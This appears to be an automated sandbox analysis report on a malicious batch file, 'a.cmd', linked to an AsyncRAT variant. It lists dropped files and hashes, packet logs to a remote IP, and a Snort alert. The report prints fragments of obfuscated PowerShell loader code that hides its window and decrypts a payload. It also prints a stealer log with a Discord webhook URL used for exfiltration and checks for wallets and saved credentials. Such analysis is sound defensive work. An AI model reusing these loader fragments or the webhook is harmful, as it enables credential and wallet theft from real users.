                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbzezbpb.24g.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pzpccrcs.hgd.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yctc3hx2.pv2.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\ce3ed400-d1e84918ad678b08d2a369a3-Latest.log

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text
                                                                                    Category:modified
                                                                                    Size (bytes):2131
                                                                                    Entropy (8bit):5.066787996648865
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:XtEHcSgA+Ja2WpEF4q6+fSTIGH9rlR1R42Mj2RIJEvJEtZdQgX9rTrNUXs+rKE1A:2HNgA12W66iSq8bitbcX7j06p2Ww
                                                                                    MD5:A1588EA067220A2AA17CF972A1D508C8
                                                                                    SHA1:1FCD4ADC08DCCAD2051A3C6E1CC53FFF6C36CCBD
                                                                                    SHA-256:8ABE1DB12909394BC1DC5848299F34996AE36A4DAA5E61A2722CEF24FC4E36CC
                                                                                    SHA-512:3A2B20F882C3C6B3FCAD3E9B2705A32A648A1C4F8B87639D4370B8CDDAE32A9EC75B2F46D2A13E8416FFC1D8524E8014DEFEF1A0D6D2E921F14C331A9301B318
                                                                                    Malicious:false
                                                                                    Preview:2024/04/25 22:51:23 ::: Plugin Invoked! >> .2024/04/25 22:51:23 ::: Initializing Client.... .2024/04/25 22:51:24 ::: Plugin Connected! .2024/04/25 22:51:24 ::: Thread Starting!. .2024/04/25 22:51:24 ::: Reading Packet! https://discord.com/api/webhooks/895657579101958174/9Z8CPsHdivzzExezi2PenJZuA1sRTvhR7zSiHiSBhPgUVEAa9HBgrmebF0mbhr4vycB6>>. ...2024/04/25 22:51:24 ::: Removing Old Data>> Started!. .2024/04/25 22:51:24 ::: HideFile : Adding 'hidden' attribute to file C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7 .2024/04/25 22:51:24 ::: Removing Old Data>> Ended!. .2024/04/25 22:51:24 ::: Starting Making Report >> .2024/04/25 22:51:25 ::: Steam >> Application path not found in registry .2024/04/25 22:51:25 ::: Uplay >> Session not found .2024/04/25 22:51:25 ::: BattleNET >> Session not found .2024/04/25 22:51:25 ::: Wallets >> Desktop Wallet is Empty!. .2024/04/25 22:51:25 ::: Chrome Browser Wallets >> No wallets from Chrome browser. ...2024/04/25 22:51:25 ::: FileZila >>

                                                                                    C:\Users\user\AppData\Local\Temp\tmp562F.tmp.dat

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                    Category:dropped
                                                                                    Size (bytes):106496
                                                                                    Entropy (8bit):1.1358696453229276
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\tmp5640.tmp.dat

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                    Category:dropped
                                                                                    Size (bytes):40960
                                                                                    Entropy (8bit):0.8553638852307782
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\tmp5651.tmp.dat

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                    Category:dropped
                                                                                    Size (bytes):159744
                                                                                    Entropy (8bit):0.7873599747470391
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                    MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                    SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                    SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                    SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\tmp5661.tmp.dat

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                    Category:dropped
                                                                                    Size (bytes):159744
                                                                                    Entropy (8bit):0.7873599747470391
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                    MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                    SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                    SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                    SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\tmp5662.tmp.dat

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                    Category:dropped
                                                                                    Size (bytes):106496
                                                                                    Entropy (8bit):1.1358696453229276
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\tmp5692.tmp.dat

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):5242880
                                                                                    Entropy (8bit):0.037963276276857943
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                    MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                    SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                    SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                    SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\tmp5710.tmp.dat

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                    Category:dropped
                                                                                    Size (bytes):98304
                                                                                    Entropy (8bit):0.08235737944063153
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\tmp5721.tmp.dat

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):5242880
                                                                                    Entropy (8bit):0.037963276276857943
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                    MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                    SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                    SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                    SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    \Device\ConDrv

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with very long lines (2108), with CRLF, LF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):3391
                                                                                    Entropy (8bit):5.868325245655375
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:SlV5MNmoZSQ7yBgBkzi6kyQpRA06ivwJZN6i:SlLq+YkpOA06ivw7N6i
                                                                                    MD5:A053F6BDD7F2DCA8E821BC2CBE68983B
                                                                                    SHA1:DF1938AC27F4928AA83E00C2442DA4DF6317CD92
                                                                                    SHA-256:BBB0808D97BC92761828822E493E9322C50768A306F5AE7256E29C6061228059
                                                                                    SHA-512:629107810A9F82D82D8951CDC34E065EECC8E6C54DD04CAC51D4DC22513FD4B094D11A17086F9FE6C3BD0FED5A4888D4CAA9CBF9FEB36696055617076B6AB64B
                                                                                    Malicious:false
                                                                                    Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\a.cmd';$LzXa='RUWTCeaUWTCdLUWTCineUWTCsUWTC'.Replace('UWTC', ''),'ChZJGfangZJGfeExZJGftenZJGfsiZJGfonZJGf'.Replace('ZJGf', ''),'CAhKEreaAhKEteDAhKEeAhKEcAhKErypAhKEtorAhKE'.Replace('AhKE', ''),'FroBWNamBBWNaasBWNae6BWNa4SBWNatrBWNaiBWNangBWNa'.Replace('BWNa', ''),'DWncieWncicomWnciprWnciessWnci'.Replace('Wnci', ''),'TrOZMganOZMgsfoOZMgrmOZMgFinOZMgalOZMgBOZMgloOZMgckOZMg'.Replace('OZMg', ''),'EleFTeEmFTeEeFTeEnFTeEtAtFTeE'.Replace('FTeE', ''),'MMLMhainMLMhMoMLMhduMLMhlMLMheMLMh'.Replace('MLMh', ''),'EnWitytWityrWityyPWityoWityintWity'.Replace('Wity', ''),'CopyJeHyTyJeHoyJeH'.Replace('yJeH', ''),'SplVFEiiVFEitVFEi'.Replace('VFEi', ''),'GetHQKMCuHQKMrHQKMreHQKMntPHQKMrocHQKMeHQKMsHQKMsHQKM'.Replace('HQKM', ''),'IhYurnvohYurkehYur'.Replace('hYur', ''),'LoaEJSmdEJSm'.Replace('EJSm', '');powershell -w hidden;function kTjsA($UARpu){$rvnjY=[System.Security.Cryptography.Aes]::Create();$rvnjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:ASCII text, with very long lines (46874), with CRLF line terminators
                                                                                    Entropy (8bit):6.018035802358209
                                                                                    TrID:
                                                                                      File name:a.cmd
                                                                                      File size:84'441 bytes
                                                                                      MD5:0b72d9b98a14810527f555cad408e756
                                                                                      SHA1:e24969bea50bebde5905068c993324fae2470ac6
                                                                                      SHA256:fc1c119af2b10c067771cf36170a8b4ac28db714d14cde45a96b4807d654ded5
                                                                                      SHA512:acb4399d53b0b29a23ef04cfae67069a03a115a3da5af22587ba1c47193bc6bad892cdfc90818421658749c68cb90a7dd9436bc507e150dd4db835d7bccf81ce
                                                                                      SSDEEP:1536:oGr7JprjygfWS26G0KbG/9CHHJxPFg2Ta9bt3nliqnOh991geWFY4dAvGyMryXAV:oy77jwS2X0mG/9upxtg2A3nYt1vHGPTV
                                                                                      TLSH:BE83F11AC96DDFAACA4E139F35063AF75978708EC0EC93CBA18B2D45F88D618D85C314
                                                                                      File Content Preview:start /min /b cmd /c \"set __=^&rem\..set "bXBRSXNK=sOLtuqetOLtuq ZOLtuqGhOLtuqVOLtuqbAOLtuq=OLtuq=OLtuq=1OLtuq &OLtuq& OLtuqsOLtuqtOLtuqarOLtuqt OLtuq""OLtuq /OLtuqmiOLtuqnOLtuq OLtuq"..set "d1ZveUhj=&OLtuq&OLtuq eOLtuqxitOLtuq"..set "ald3dUZo=noOLtuqt d

                                                                                      File Icon

                                                                                      Icon Hash:9686878b929a9886

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      04/25/24-22:45:11.789646TCP2848152ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant)32324973091.92.249.117192.168.2.4

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 25, 2024 22:45:11.376856089 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:11.576436996 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:11.576608896 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:11.584481001 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:11.789645910 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:11.796155930 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:12.002640963 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:12.058080912 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:12.642390013 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:12.885560036 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:12.885617971 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:13.135636091 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:13.444732904 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:13.495621920 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:13.694674015 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:13.705126047 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:13.904925108 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:13.905025005 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:14.154406071 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:14.995425940 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:14.995934963 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:14.995951891 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:14.995976925 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:14.995980024 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:14.996016026 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:14.996063948 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:14.996169090 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:14.996203899 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:14.996222019 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:14.996254921 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:14.996277094 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:14.996290922 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:14.996360064 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:14.996396065 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:14.996428967 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:14.996469975 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:14.996498108 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.195261002 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195283890 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195321083 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195374012 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.195379019 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195416927 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195431948 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.195481062 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195519924 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.195550919 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195593119 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195612907 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195631027 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.195647955 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195672035 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195686102 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.195770979 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195816040 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195821047 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.195830107 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195867062 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.195880890 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195894957 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195915937 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.195930958 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.195964098 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.196002007 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.196017027 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.196041107 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.196078062 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.196093082 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.196181059 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.196219921 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.394629955 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.394654036 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.394668102 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.394680977 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.394695044 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.394711018 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.394747019 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.394753933 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.394803047 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.394804955 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.394815922 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.394828081 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.394849062 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.394882917 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.394901991 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.394927979 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.394948959 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.394962072 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.394980907 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.394983053 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.395005941 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.395025015 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:45:15.395056009 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.395067930 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:45:15.395092010 CEST497303232192.168.2.491.92.249.117
